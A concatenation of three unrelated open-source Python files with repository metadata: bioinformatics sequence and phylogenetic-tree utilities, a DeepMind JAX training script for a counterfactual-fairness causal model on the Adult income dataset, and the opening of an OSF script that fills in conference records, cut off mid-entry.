phylogenetic tree. Can use either a Bio.Phylo object or a dendropy.Tree object (much faster). 
Parameters ---------- tree : obj A phylogenetic tree object. Returns ------- pwdist : pd.DataFrame Symmetric table of all pairwise distances with node labels as columns and index.""" if isinstance(tree, type(Phylo.BaseTree.Tree())): N = len(tree.get_terminals()) names = [node.name for node in tree.get_terminals()] pwdist = np.zeros((N, N)) for i, node1 in enumerate(tree.get_terminals()): for j, node2 in enumerate(tree.get_terminals()): """Compute half of these and assume symmetry""" if i==j: pwdist[i, j] = 0 elif i<j: pwdist[i, j] = tree.distance(node1, node2) pwdist[j, i] = pwdist[i, j] elif isinstance(tree, type(dendropy.Tree())): pdm = dendropy.treecalc.PatristicDistanceMatrix(tree) taxon_set = [n.taxon for n in tree.leaf_nodes()] N = len(taxon_set) names = [taxa.label for taxa in taxon_set] pwdist = np.zeros((N, N)) for i, t1 in enumerate(taxon_set): for j, t2 in enumerate(taxon_set): """Compute half of these and assume symmetry""" if i==j: pwdist[i, j] = 0 elif i<j: pwdist[i, j] = pdm(t1, t2) pwdist[j, i] = pwdist[i, j] else: print('Tree type does not match Phylo.BaseTree.Tree or dendropy.Tree') return return pd.DataFrame(pwdist, index = names, columns = names) def overlappingKmers(s, k=15, overlap=11, includeFinalPeptide=True, returnStartInds=False): """Create a list of overlapping kmers from a single sequence Params ------ s : sequence (sliceable object) k : int Length of each mer overlap : int Overlap between each consecutive kmer includeFinalPeptide : bool If True, include a peptide of length k that covers the end of the sequence. returnStartInds : bool If True, return start indices for each peptide. Returns ------- mers : list of kmers inds : list of indices (optional)""" inds = [i for i in range(0, len(s), k-overlap) if i+k < len(s)] if includeFinalPeptide and not s[-k:] == s[inds[-1]:inds[-1]+k]: inds.append(len(s)-k) mers = [s[i:i+k] for i in inds] if returnStartInds: return mers, inds else: return mers def compSeq(s1, s2, lineL=50): """Print two sequences showing mismatches. Parameters ---------- s1, s2 : str Strings representing aligned AA or NT sequences lineL : int Wrap line at lineL""" lineN = int(np.ceil(min(len(s1), len(s2))/lineL)) count = 0 samecount = 0 outStr = '' for linei in range(lineN): if (linei+1) * lineL < min(len(s1), len(s2)): end = (linei+1) * lineL else: end = min(len(s1), len(s2)) outStr += 'Pos %d - %d\n' % (linei*lineL+1, end-1+1) for sitei in range(linei*lineL, end): outStr += s1[sitei] outStr += '\n' for sitei in range(linei*lineL, end): out = ' ' if s1[sitei] == s2[sitei] else '|' outStr += out count += 1 samecount += 1 if s1[sitei]==s2[sitei] else 0 outStr += '\n' for sitei in range(linei*lineL, end): out = '.' if s1[sitei] == s2[sitei] else s2[sitei] outStr += s2[sitei] outStr += '\n\n' outStr += 'Seq1 (%d) and Seq2 (%d) are %1.1f%% similar\n\n' % (len(s1), len(s2), 1e2*samecount/count) print(outStr) def getStartPos(peptide, seq, subst=None): """Align the peptide with seq using the supplied substitution matrix and return the start position. Start position is 0-based Parameters ---------- peptide : str Peptide to align. seq : str AA sequence. subst : dict of dicts Scores for each pair of AAs in peptide and sequence. Returns ------- start : int Start position 0-based.""" return getStartPosMapper(seq, subst)(peptide) def getStartPosMapper(seq, subst=None): """Factory that returns a function to align peptides to seq. 
    Can be used as the mapping function for a peptide column in a DataFrame,
    to align the column to a reference sequence

    Parameters
    ----------
    seq : str
        AA sequence.
    subst : dict of dicts
        Scores for each pair of AAs in peptide and sequence.

    Returns
    -------
    findPos : function
        Function with one argument: a peptide sequence to align."""
    if subst is None:
        subst = make_identity_substitution_matrix(1, -1, alphabet=AALPHABET)

    ssw = StripedSmithWaterman(query_sequence=seq,
                               protein=True,
                               substitution_matrix=subst)

    def findPos(pep):
        d = ssw(pep)
        return int(d['query_begin'] - d['target_begin'])
    return findPos

def mutual_information(x, y, logfunc=np.log2, nperms=1e4):
    """Calculates mutual information between the paired iterables x and y
    Returns M(x,y), p-value, and entropy of x, y, and zip(x,y)
    Methods are all described in Gilbert et al. (AIDS 2005)"""
    def entropy(freqDict):
        return -np.array([p * logfunc(p) for p in freqDict.values()]).sum()

    freqx = objhist(x)
    freqy = objhist(y)

    Hx = freqx.entropy()
    Hy = freqy.entropy()
    Hxy = objhist(zip(x, y)).entropy()
    M = Hx + Hy - Hxy
    Mstar = 2*M / (Hx + Hy)

    if len(freqx) == 1 or len(freqy) == 1:
        p = 1
    elif np.all([xi == yi for xi, yi in zip(x, y)]):
        p = 0
    else:
        Mperms = np.array([Hx + Hy - objhist(zip(permutation(x), y)).entropy() for i in np.arange(nperms)])
        p = (Mperms >= M).sum() / nperms
    return M, Mstar, p, Hx, Hy, Hxy

def kl(p, q):
    """Kullback-Leibler divergence D(P || Q) for discrete distributions

    Parameters
    ----------
    p, q : array-like, dtype=float, shape=n
        Discrete probability distributions.
    """
    p = np.asarray(p, dtype=float)
    q = np.asarray(q, dtype=float)

    return np.where(p != 0, p * np.log(p / q), 0).sum()
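
# --- Illustrative usage sketch (editor's addition, not part of the original
# module). A minimal sanity check of kl() on two small discrete
# distributions; numpy is already imported as np at the top of this module.
if __name__ == '__main__':
    _p = np.array([0.5, 0.25, 0.25])
    _q = np.array([1. / 3, 1. / 3, 1. / 3])
    # D(P || Q) is asymmetric and non-negative; D(P || P) == 0.
    print(kl(_p, _q))  # small positive value (in nats, since np.log is used)
    print(kl(_p, _p))  # 0.0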
agartland/utils
seqtools.py
Python
mit
37,732
[ "Cytoscape" ]
c5130d73a43b444a3cf7176e2b3d7f8062ab379a8bd09858533b91135dd370f4
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Training script for causal model for Adult dataset, using PSCF."""

import functools
import time
from typing import Any, List, Mapping, NamedTuple, Sequence

from absl import app
from absl import flags
from absl import logging
import haiku as hk
import jax
import jax.numpy as jnp
from ml_collections.config_flags import config_flags
import numpy as np
import optax
import pandas as pd
from sklearn import metrics
import tensorflow as tf
import tensorflow_datasets as tfds
from tensorflow_probability.substrates import jax as tfp

from counterfactual_fairness import adult
from counterfactual_fairness import causal_network
from counterfactual_fairness import utils
from counterfactual_fairness import variational

FLAGS = flags.FLAGS
config_flags.DEFINE_config_file(
    'config',
    'adult_pscf_config.py',
    'Training configuration.')

LOG_EVERY = 100

# These are all aliases to callables which will return instances of
# particular distribution modules, or a Node itself. This is used to make
# subsequent code more legible.
Node = causal_network.Node
Gaussian = causal_network.Gaussian
MLPMultinomial = causal_network.MLPMultinomial


def build_input(train_data: pd.DataFrame,
                batch_size: int,
                training_steps: int,
                shuffle_size: int = 10000):
  """Builds an iterator of numpy batches over the training dataframe."""
  num_epochs = (training_steps // batch_size) + 1
  ds = utils.get_dataset(train_data, batch_size, shuffle_size,
                         num_epochs=num_epochs)
  ds = ds.prefetch(tf.data.AUTOTUNE)
  return iter(tfds.as_numpy(ds))


class CausalNetOutput(NamedTuple):
  q_hidden_obs: Sequence[tfp.distributions.Distribution]
  p_hidden: Sequence[tfp.distributions.Distribution]
  hidden_samples: Sequence[jnp.ndarray]
  log_p_obs_hidden: jnp.ndarray
  is_male: jnp.ndarray  # indicates which elements of the batch correspond to
                        # male individuals


def build_causal_graph(train_data: pd.DataFrame, column_names: List[str],
                       inputs: jnp.ndarray):
  """Build the causal graph of the model."""
  make_multinomial = functools.partial(
      causal_network.MLPMultinomial.from_frame, hidden_shape=(100,))
  make_gaussian = functools.partial(
      causal_network.Gaussian, hidden_shape=(100,))

  # Construct the graphical model. Each random variable is represented by an
  # instance of the `Node` class, as discussed in that class's docstring.

  # The following nodes have no parents, and thus the distribution modules
  # will not be conditional on anything -- they simply represent priors.
  node_a = Node(MLPMultinomial.from_frame(train_data, 'sex'))
  node_c1 = Node(MLPMultinomial.from_frame(train_data, 'native-country'))
  node_c2 = Node(Gaussian('age', column_names.index('age')))

  # These are all hidden nodes, that do not correspond to any actual data in
  # pandas dataframe loaded previously. We therefore are permitted to control
  # the dimensionality of these nodes as we wish (with the `dim` argument).
# The distribution module here should be interpreted as saying that we are # imposing a multi-modal prior (a mixture of Gaussians) on each latent # variable. node_hm = Node(causal_network.GaussianMixture('hm', 10, dim=2), hidden=True) node_hl = Node(causal_network.GaussianMixture('hl', 10, dim=2), hidden=True) node_hr1 = Node( causal_network.GaussianMixture('hr1', 10, dim=2), hidden=True) node_hr2 = Node( causal_network.GaussianMixture('hr2', 10, dim=2), hidden=True) node_hr3 = Node( causal_network.GaussianMixture('hr3', 10, dim=2), hidden=True) # The rest of the graph is now constructed; the order of construction is # important, so we can inform each node of its parents. # Note that in the paper we simply have one node called "R", but here it is # separated into three separate `Node` instances. This is necessary since # each node can only represent a single quantity in the dataframe. node_m = Node( make_multinomial(train_data, 'marital-status'), [node_a, node_hm, node_c1, node_c2]) node_l = Node( make_gaussian('education-num', column_names.index('education-num')), [node_a, node_hl, node_c1, node_c2, node_m]) node_r1 = Node( make_multinomial(train_data, 'occupation'), [node_a, node_c1, node_c2, node_m, node_l]) node_r2 = Node( make_gaussian('hours-per-week', column_names.index('hours-per-week')), [node_a, node_c1, node_c2, node_m, node_l]) node_r3 = Node( make_multinomial(train_data, 'workclass'), [node_a, node_c1, node_c2, node_m, node_l]) node_y = Node( MLPMultinomial.from_frame(train_data, 'income'), [node_a, node_c1, node_c2, node_m, node_l, node_r1, node_r2, node_r3]) # We now construct several (self-explanatory) collections of nodes. These # will be used at various points later in the code, and serve to provide # greater semantic interpretability. observable_nodes = (node_a, node_c1, node_c2, node_l, node_m, node_r1, node_r2, node_r3, node_y) # The nodes on which each latent variable is conditionally dependent. # Note that Y is not in this list, since all of its dependencies are # included below, and further it does not depend directly on Hm. nodes_on_which_hm_depends = (node_a, node_c1, node_c2, node_m) nodes_on_which_hl_depends = (node_a, node_c1, node_c2, node_m, node_l) nodes_on_which_hr1_depends = (node_a, node_c1, node_c2, node_m, node_l, node_r1) nodes_on_which_hr2_depends = (node_a, node_c1, node_c2, node_m, node_l, node_r2) nodes_on_which_hr3_depends = (node_a, node_c1, node_c2, node_m, node_l, node_r3) hidden_nodes = (node_hm, node_hl, node_hr1, node_hr2, node_hr3) # Function to create the distribution needed for variational inference. This # is the same for each latent variable. def make_q_x_obs_module(node): """Make a Variational module for the given hidden variable.""" assert node.hidden return variational.Variational( common_layer_sizes=(20, 20), output_dim=node.dim) # For each latent variable, we first construct a Haiku module (using the # function above), and then connect it to the graph using the node's # value. As described in more detail in the documentation for `Node`, # these values represent actual observed data. Therefore we will later # be connecting these same modules to the graph in different ways in order # to perform fair inference. 
q_hm_obs_module = make_q_x_obs_module(node_hm) q_hl_obs_module = make_q_x_obs_module(node_hl) q_hr1_obs_module = make_q_x_obs_module(node_hr1) q_hr2_obs_module = make_q_x_obs_module(node_hr2) q_hr3_obs_module = make_q_x_obs_module(node_hr3) causal_network.populate(observable_nodes, inputs) q_hm_obs = q_hm_obs_module( *(node.observed_value for node in nodes_on_which_hm_depends)) q_hl_obs = q_hl_obs_module( *(node.observed_value for node in nodes_on_which_hl_depends)) q_hr1_obs = q_hr1_obs_module( *(node.observed_value for node in nodes_on_which_hr1_depends)) q_hr2_obs = q_hr2_obs_module( *(node.observed_value for node in nodes_on_which_hr2_depends)) q_hr3_obs = q_hr3_obs_module( *(node.observed_value for node in nodes_on_which_hr3_depends)) q_hidden_obs = (q_hm_obs, q_hl_obs, q_hr1_obs, q_hr2_obs, q_hr3_obs) return observable_nodes, hidden_nodes, q_hidden_obs def build_forward_fn(train_data: pd.DataFrame, column_names: List[str], likelihood_multiplier: float): """Create the model's forward pass.""" def forward_fn(inputs: jnp.ndarray) -> CausalNetOutput: """Forward pass.""" observable_nodes, hidden_nodes, q_hidden = build_causal_graph( train_data, column_names, inputs) (node_hm, node_hl, node_hr1, node_hr2, node_hr3) = hidden_nodes (node_a, _, _, _, _, _, _, _, node_y) = observable_nodes # Log-likelihood function. def log_p_obs_h(hm_value, hl_value, hr1_value, hr2_value, hr3_value): """Compute log P(A, C, M, L, R, Y | H).""" # In order to create distributions like P(M | H_m, A, C), we need # the value of H_m that we've been provided as an argument, rather than # the value stored on H_m (which, in fact, will never be populated # since H_m is unobserved). # For compactness, we first construct the complete list of replacements. node_to_replacement = { node_hm: hm_value, node_hl: hl_value, node_hr1: hr1_value, node_hr2: hr2_value, node_hr3: hr3_value, } def log_prob_for_node(node): """Given a node, compute it's log probability for the given latents.""" log_prob = jnp.squeeze( node.make_distribution(node_to_replacement).log_prob( node.observed_value)) return log_prob # We apply the likelihood multiplier to all likelihood terms except that # for Y, the target. This is then added on separately in the line below. sum_no_y = likelihood_multiplier * sum( log_prob_for_node(node) for node in observable_nodes if node is not node_y) return sum_no_y + log_prob_for_node(node_y) q_hidden_obs = tuple(q_hidden) p_hidden = tuple(node.distribution for node in hidden_nodes) rnd_key = hk.next_rng_key() hidden_samples = tuple( q_hidden.sample(seed=rnd_key) for q_hidden in q_hidden_obs) log_p_obs_hidden = log_p_obs_h(*hidden_samples) # We need to split our batch of data into male and female parts. is_male = jnp.equal(node_a.observed_value[:, 1], 1) return CausalNetOutput( q_hidden_obs=q_hidden_obs, p_hidden=p_hidden, hidden_samples=hidden_samples, log_p_obs_hidden=log_p_obs_hidden, is_male=is_male) def fair_inference_fn(inputs: jnp.ndarray, batch_size: int, num_prediction_samples: int): """Get the fair and unfair predictions for the given input.""" observable_nodes, hidden_nodes, q_hidden_obs = build_causal_graph( train_data, column_names, inputs) (node_hm, node_hl, node_hr1, node_hr2, node_hr3) = hidden_nodes (node_a, node_c1, node_c2, node_l, node_m, node_r1, node_r2, node_r3, node_y) = observable_nodes (q_hm_obs, q_hl_obs, q_hr1_obs, q_hr2_obs, q_hr3_obs) = q_hidden_obs rnd_key = hk.next_rng_key() # *** FAIR INFERENCE *** # To predict Y in a fair sense: # * Infer Hm given observations. 
# * Infer M using inferred Hm, baseline A, real C # * Infer L using inferred Hl, M, real A, C # * Infer Y using inferred M, baseline A, real C # This is done by numerical integration, i.e. draw samples from # p_fair(Y | A, C, M, L). a_all_male = jnp.concatenate( (jnp.zeros((batch_size, 1)), jnp.ones((batch_size, 1))), axis=1) # Here we take a num_samples per observation. This results to # an array of shape: # (num_samples, batch_size, hm_dim). # However, forward pass is easier by reshaping to: # (num_samples * batch_size, hm_dim). hm_dim = 2 def expanded_sample(distribution): return distribution.sample( num_prediction_samples, seed=rnd_key).reshape( (batch_size * num_prediction_samples, hm_dim)) hm_pred_sample = expanded_sample(q_hm_obs) hl_pred_sample = expanded_sample(q_hl_obs) hr1_pred_sample = expanded_sample(q_hr1_obs) hr2_pred_sample = expanded_sample(q_hr2_obs) hr3_pred_sample = expanded_sample(q_hr3_obs) # The values of the observed nodes need to be tiled to match the dims # of the above hidden samples. The `expand` function achieves this. def expand(observed_value): return jnp.tile(observed_value, (num_prediction_samples, 1)) expanded_a = expand(node_a.observed_value) expanded_a_baseline = expand(a_all_male) expanded_c1 = expand(node_c1.observed_value) expanded_c2 = expand(node_c2.observed_value) # For M, and all subsequent variables, we only generate one sample. This # is because we already have *many* samples from the latent variables, and # all we require is an independent sample from the distribution. m_pred_sample = node_m.make_distribution({ node_a: expanded_a_baseline, node_hm: hm_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2}).sample(seed=rnd_key) l_pred_sample = node_l.make_distribution({ node_a: expanded_a, node_hl: hl_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample}).sample(seed=rnd_key) r1_pred_sample = node_r1.make_distribution({ node_a: expanded_a, node_hr1: hr1_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample}).sample(seed=rnd_key) r2_pred_sample = node_r2.make_distribution({ node_a: expanded_a, node_hr2: hr2_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample}).sample(seed=rnd_key) r3_pred_sample = node_r3.make_distribution({ node_a: expanded_a, node_hr3: hr3_pred_sample, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample}).sample(seed=rnd_key) # Finally, we sample from the distribution for Y. Like above, we only # draw one sample per element in the array. y_pred_sample = node_y.make_distribution({ node_a: expanded_a_baseline, # node_a: expanded_a, node_c1: expanded_c1, node_c2: expanded_c2, node_m: m_pred_sample, node_l: l_pred_sample, node_r1: r1_pred_sample, node_r2: r2_pred_sample, node_r3: r3_pred_sample}).sample(seed=rnd_key) # Reshape back to (num_samples, batch_size, y_dim), undoing the expanding # operation used for sampling. y_pred_sample = y_pred_sample.reshape( (num_prediction_samples, batch_size, -1)) # Now form an array of shape (batch_size, y_dim) by taking an expectation # over the sample dimension. This represents the probability that the # result is in each class. y_pred_expectation = jnp.mean(y_pred_sample, axis=0) # Find out the predicted y, for later use in a confusion matrix. 
    predicted_class_y_fair = utils.multinomial_class(y_pred_expectation)

    # *** NAIVE INFERENCE ***
    predicted_class_y_unfair = utils.multinomial_class(node_y.distribution)

    return predicted_class_y_fair, predicted_class_y_unfair

  return forward_fn, fair_inference_fn


def _loss_fn(
    forward_fn,
    beta: float,
    mmd_sample_size: int,
    constraint_multiplier: float,
    constraint_ratio: float,
    params: hk.Params,
    rng: jnp.ndarray,
    inputs: jnp.ndarray,
) -> jnp.ndarray:
  """Loss function definition."""
  outputs = forward_fn(params, rng, inputs)
  loss = _loss_klqp(outputs, beta)

  # Create the MMD constraint penalty and add it to the overall loss term.
  # Note that `constraint_ratio` is a traced value inside the jitted update
  # (it is derived from the training step), so we cannot branch on it in
  # Python here; the penalty is always computed and is simply scaled to zero
  # until the constraint is turned on.
  constraint_loss = 0.
  for distribution in outputs.q_hidden_obs:
    constraint_loss += (constraint_ratio * constraint_multiplier *
                        utils.mmd_loss(distribution,
                                       outputs.is_male,
                                       mmd_sample_size,
                                       rng))
  loss += constraint_loss

  return loss


def _evaluate(
    fair_inference_fn,
    params: hk.Params,
    rng: jnp.ndarray,
    inputs: jnp.ndarray,
    batch_size: int,
    num_prediction_samples: int,
):
  """Perform evaluation of fair inference."""
  output = fair_inference_fn(params, rng, inputs, batch_size,
                             num_prediction_samples)
  return output


def _loss_klqp(outputs: CausalNetOutput, beta: float) -> jnp.ndarray:
  """Compute the loss on data wrt params."""
  expected_log_q_hidden_obs = sum(
      jnp.sum(q_hidden_obs.log_prob(hidden_sample), axis=1)
      for q_hidden_obs, hidden_sample in zip(outputs.q_hidden_obs,
                                             outputs.hidden_samples))
  assert expected_log_q_hidden_obs.ndim == 1

  # For log probabilities computed from distributions, we need to sum along
  # the last axis, which takes the product of distributions for
  # multi-dimensional hidden variables.
  log_p_hidden = sum(
      jnp.sum(p_hidden.log_prob(hidden_sample), axis=1)
      for p_hidden, hidden_sample in zip(outputs.p_hidden,
                                         outputs.hidden_samples))

  assert outputs.log_p_obs_hidden.ndim == 1
  kl_divergence = (
      beta * (expected_log_q_hidden_obs - log_p_hidden)
      - outputs.log_p_obs_hidden)
  return jnp.mean(kl_divergence)


class Updater:
  """A stateless abstraction around an init_fn/update_fn pair.

  This extracts some common boilerplate from the training loop.
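
  Typical usage (an illustrative sketch; the variable names below are
  assumptions, not part of the original code):

    updater = Updater(net_init, loss_fn, eval_fn, optimizer, turn_on_step)
    state = updater.init(rng, first_batch)
    state, metrics = updater.update(state, batch)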
""" def __init__(self, net_init, loss_fn, eval_fn, optimizer: optax.GradientTransformation, constraint_turn_on_step): self._net_init = net_init self._loss_fn = loss_fn self._eval_fn = eval_fn self._opt = optimizer self._constraint_turn_on_step = constraint_turn_on_step @functools.partial(jax.jit, static_argnums=0) def init(self, init_rng, data): """Initializes state of the updater.""" params = self._net_init(init_rng, data) opt_state = self._opt.init(params) out = dict( step=np.array(0), rng=init_rng, opt_state=opt_state, params=params, ) return out @functools.partial(jax.jit, static_argnums=0) def update(self, state: Mapping[str, Any], data: jnp.ndarray): """Updates the state using some data and returns metrics.""" rng = state['rng'] params = state['params'] constraint_ratio = (state['step'] > self._constraint_turn_on_step).astype( float) loss, g = jax.value_and_grad(self._loss_fn, argnums=1)( constraint_ratio, params, rng, data) updates, opt_state = self._opt.update(g, state['opt_state']) params = optax.apply_updates(params, updates) new_state = { 'step': state['step'] + 1, 'rng': rng, 'opt_state': opt_state, 'params': params, } new_metrics = { 'step': state['step'], 'loss': loss, } return new_state, new_metrics @functools.partial(jax.jit, static_argnums=(0, 3, 4)) def evaluate(self, state: Mapping[str, Any], inputs: jnp.ndarray, batch_size: int, num_prediction_samples: int): """Evaluate fair inference.""" rng = state['rng'] params = state['params'] fair_pred, unfair_pred = self._eval_fn(params, rng, inputs, batch_size, num_prediction_samples) return fair_pred, unfair_pred def main(_): flags_config = FLAGS.config # Create the dataset. train_data, test_data = adult.read_all_data(FLAGS.dataset_dir) column_names = list(train_data.columns) train_input = build_input(train_data, flags_config.batch_size, flags_config.num_steps) # Set up the model, loss, and updater. forward_fn, fair_inference_fn = build_forward_fn( train_data, column_names, flags_config.likelihood_multiplier) forward_fn = hk.transform(forward_fn) fair_inference_fn = hk.transform(fair_inference_fn) loss_fn = functools.partial(_loss_fn, forward_fn.apply, flags_config.beta, flags_config.mmd_sample_size, flags_config.constraint_multiplier) eval_fn = functools.partial(_evaluate, fair_inference_fn.apply) optimizer = optax.adam(flags_config.learning_rate) updater = Updater(forward_fn.init, loss_fn, eval_fn, optimizer, flags_config.constraint_turn_on_step) # Initialize parameters. logging.info('Initializing parameters...') rng = jax.random.PRNGKey(42) train_data = next(train_input) state = updater.init(rng, train_data) # Training loop. logging.info('Starting train loop...') prev_time = time.time() for step in range(flags_config.num_steps): train_data = next(train_input) state, stats = updater.update(state, train_data) if step % LOG_EVERY == 0: steps_per_sec = LOG_EVERY / (time.time() - prev_time) prev_time = time.time() stats.update({'steps_per_sec': steps_per_sec}) logging.info({k: float(v) for k, v in stats.items()}) # Evaluate. logging.info('Starting evaluation...') test_input = build_input(test_data, flags_config.batch_size, training_steps=0, shuffle_size=0) predicted_test_y = [] corrected_test_y = [] while True: try: eval_data = next(test_input) # Now run the fair prediction; this projects the input to the latent space # and then performs sampling. 
predicted_class_y_fair, predicted_class_y_unfair = updater.evaluate( state, eval_data, flags_config.batch_size, flags_config.num_prediction_samples) predicted_test_y.append(predicted_class_y_unfair) corrected_test_y.append(predicted_class_y_fair) # logging.info('Completed evaluation step %d', step) except StopIteration: logging.info('Finished evaluation') break # Join together the predictions from each batch. test_y = np.concatenate(predicted_test_y, axis=0) tweaked_test_y = np.concatenate(corrected_test_y, axis=0) # Note the true values for computing accuracy and confusion matrices. y_true = test_data['income'].cat.codes # Make sure y_true is the same size y_true = y_true[:len(test_y)] test_accuracy = metrics.accuracy_score(y_true, test_y) tweaked_test_accuracy = metrics.accuracy_score( y_true, tweaked_test_y) # Print out accuracy and confusion matrices. logging.info('Accuracy (full model): %f', test_accuracy) logging.info('Confusion matrix:') logging.info(metrics.confusion_matrix(y_true, test_y)) logging.info('') logging.info('Accuracy (tweaked with baseline: Male): %f', tweaked_test_accuracy) logging.info('Confusion matrix:') logging.info(metrics.confusion_matrix(y_true, tweaked_test_y)) if __name__ == '__main__': app.run(main)
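
# Illustrative invocation (editor's note, not part of the original script).
# `--config` is defined above via config_flags; `--dataset_dir` is consumed in
# main() but is assumed to be defined elsewhere in the counterfactual_fairness
# package:
#
#   python -m counterfactual_fairness.adult_pscf \
#     --config=counterfactual_fairness/adult_pscf_config.py \
#     --dataset_dir=/path/to/adult_csv_files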
deepmind/deepmind-research
counterfactual_fairness/adult_pscf.py
Python
apache-2.0
23,095
[ "Gaussian" ]
9507a1daaad4f2f0b052187f7f693d5dd96deb304e493dc462abaf91e8676ce7
#!/usr/bin/env python
# encoding: utf-8

import os
import sys

from modularodm import Q
from modularodm.exceptions import ModularOdmException

from framework.auth.core import User
from website import settings
from website.app import init_app
from website.conferences.model import Conference
from datetime import datetime


def main():
    init_app(set_backends=True, routes=False)
    dev = 'dev' in sys.argv
    populate_conferences(dev=dev)


MEETING_DATA = {
    'spsp2014': {
        'name': 'Society for Personality and Social Psychology 2014',
        'info_url': None,
        'logo_url': None,
        'location': 'Austin, TX',
        'start_date': 'Feb 13 2014',
        'end_date': 'Feb 15 2014',
        'active': False,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'asb2014': {
        'name': 'Association of Southeastern Biologists 2014',
        'info_url': 'http://www.sebiologists.org/meetings/talks_posters.html',
        'logo_url': None,
        'location': 'Spartanburg, SC',
        'start_date': 'Apr 2 2014',
        'end_date': 'Apr 4 2014',
        'active': False,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'aps2014': {
        'name': 'Association for Psychological Science 2014',
        'info_url': 'http://centerforopenscience.org/aps/',
        'logo_url': '/static/img/2014_Convention_banner-with-APS_700px.jpg',
        'location': 'San Francisco, CA',
        'start_date': 'May 22 2014',
        'end_date': 'May 25 2014',
        'active': False,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'annopeer2014': {
        'name': '#annopeer',
        'info_url': None,
        'logo_url': None,
        'location': None,
        'start_date': None,
        'end_date': None,
        'active': False,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'cpa2014': {
        'name': 'Canadian Psychological Association 2014',
        'info_url': None,
        'logo_url': None,
        'location': 'Vancouver, BC',
        'start_date': 'Jun 05 2014',
        'end_date': 'Jun 07 2014',
        'active': False,
        'admins': [],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'filaments2014': {
        'name': 'National Radio Astronomy Observatory Filaments 2014',
        'info_url': None,
        'logo_url': 'https://science.nrao.edu/science/meetings/2014/'
                    'filamentary-structure/images/filaments2014_660x178.png',
        'location': 'Charlottesville, VA',
        'start_date': 'Oct 10 2014',
        'end_date': 'Oct 11 2014',
        'active': False,
        'admins': [
            'lvonschi@nrao.edu',
            # 'Dkim@nrao.edu',
        ],
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'bitss2014': {
        'name': 'Berkeley Initiative for Transparency in the Social Sciences Research Transparency Forum 2014',
        'info_url': None,
        'logo_url': os.path.join(
            settings.STATIC_URL_PATH,
            'img',
            'conferences',
            'bitss.jpg',
        ),
        'location': 'Berkeley, CA',
        'start_date': 'Dec 11 2014',
        'end_date': 'Dec 12 2014',
        'active': False,
        'admins': [
            'gkroll@berkeley.edu',
            'awais@berkeley.edu',
        ],
        'public_projects': True,
        'poster': False,
        'talk': True,
    },
    'spsp2015': {
        'name': 'Society for Personality and Social Psychology 2015',
        'info_url': None,
        'logo_url': None,
        'location': 'Long Beach, CA',
        'start_date': 'Feb 26 2015',
        'end_date': 'Feb 28 2015',
        'active': False,
        'admins': [
            'meetings@spsp.org',
        ],
        'poster': True,
        'talk': True,
    },
    'aps2015': {
        'name': 'Association for Psychological Science 2015',
        'info_url': None,
        'logo_url': 'http://www.psychologicalscience.org/images/APS_2015_Banner_990x157.jpg',
        'location': 'New York, NY',
        'start_date': 'May 21 2015',
        'end_date': 'May 24 2015',
        'admins': [],
        'active': False,
        'public_projects': True,
        'poster': True,
        'talk': True,
    },
    'icps2015': {
        'name': 'International Convention of Psychological Science 2015',
        'info_url': None,
        'logo_url':
'http://icps.psychologicalscience.org/wp-content/themes/deepblue/images/ICPS_Website-header_990px.jpg', 'location': 'Amsterdam, The Netherlands', 'start_date': 'Mar 12 2015', 'end_date': 'Mar 14 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'mpa2015': { 'name': 'Midwestern Psychological Association 2015', 'info_url': None, 'logo_url': 'http://www.midwesternpsych.org/resources/Pictures/MPA%20logo.jpg', 'location': 'Chicago, IL', 'start_date': 'Apr 30 2015', 'end_date': 'May 02 2015', 'active': False, 'admins': [ 'mpa@kent.edu', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'NCCC2015': { 'name': 'North Carolina Cognition Conference 2015', 'info_url': None, 'logo_url': None, 'location': 'Elon, NC', 'start_date': 'Feb 21 2015', 'end_date': 'Feb 21 2015', 'active': False, 'admins': [ 'aoverman@elon.edu', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'VPRSF2015': { 'name': 'Virginia Piedmont Regional Science Fair 2015', 'info_url': None, 'logo_url': 'http://vprsf.org/wp-content/themes/VPRSF/images/logo.png', 'location': 'Charlottesville, VA', 'start_date': 'Mar 17 2015', 'end_date': 'Mar 17 2015', 'active': False, 'admins': [ 'director@vprsf.org', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'APRS2015': { 'name': 'UVA Annual Postdoctoral Research Symposium 2015', 'info_url': None, 'logo_url': 'http://s1.postimg.org/50qj9u6i7/GPA_Logo.jpg', 'location': 'Charlottesville, VA', 'start_date': None, 'end_date': None, 'active': False, 'admins': [ 'mhurst@virginia.edu', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'ASB2015': { 'name': 'Association of Southeastern Biologists 2015', 'info_url': None, 'logo_url': 'http://www.sebiologists.org/wp/wp-content/uploads/2014/09/banner_image_Large.png', 'location': 'Chattanooga, TN', 'start_date': 'Apr 01 2015', 'end_date': 'Apr 04 2015', 'active': False, 'admins': [ 'amorris.mtsu@gmail.com', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'TeaP2015': { 'name': 'Tagung experimentell arbeitender Psychologen 2015', 'info_url': None, 'logo_url': None, 'location': 'Hildesheim, Germany', 'start_date': 'Mar 08 2015', 'end_date': 'Mar 11 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 